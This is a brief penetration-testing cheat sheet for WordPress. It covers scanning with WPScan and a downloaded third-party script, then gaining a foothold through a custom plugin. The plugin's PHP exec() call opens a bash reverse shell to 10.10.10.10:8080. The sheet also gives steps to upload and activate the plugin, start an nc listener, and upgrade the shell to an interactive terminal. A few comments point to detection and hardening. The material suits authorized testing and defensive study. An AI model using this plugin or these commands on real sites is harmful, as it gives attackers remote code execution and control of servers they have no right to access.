Find WordPress Applications and Run WPScan
wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/main/Wordpress_Scanner.sh
Wordpress_Scanner.sh domains.txt
Note: set your WPScan API key in the script before running it. The script is fetched from a third-party repository, so read it before executing it.
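Scan WordPress for Vulnerabilities
- Log in to (or register on) the WPScan website and generate an API key. A token passed with --api-token ends up in shell history and process listings, so treat it as a secret.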
wpscan --url <URL> --api-token <your WP Token Here> -o output.txt
WordPress Reverse Shell
# Create a new plugin as shown below and save it as somename.php
<?php
/**
* Plugin Name: New Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 0.1
* Author: Testing dude.. hope it works
* Author URI: http://www.newfold.com
*/
// Once the plugin is active WordPress includes this file, so exec() runs with the
// privileges of the PHP process and starts bash with its stdin and stdout attached
// to an outbound TCP connection to 10.10.10.10:8080.
// Defensive view: a web-server/PHP process spawning /bin/bash is a strong detection
// signal, and listing exec in php.ini's disable_functions makes this call fail.
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.10.10/8080 0>&1'");
?>
#zip the file to somename.zip
#Start a listener
nc -nvlp 8080
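# Log in to WordPress --> Plugins --> Add New Plugin --> upload the zip
# (needs an account that can install plugins; dashboard uploads are blocked when wp-config.php defines DISALLOW_FILE_MODS)
# Activate the plugin; you should get a shell on your listener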
#Get an Interactive Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm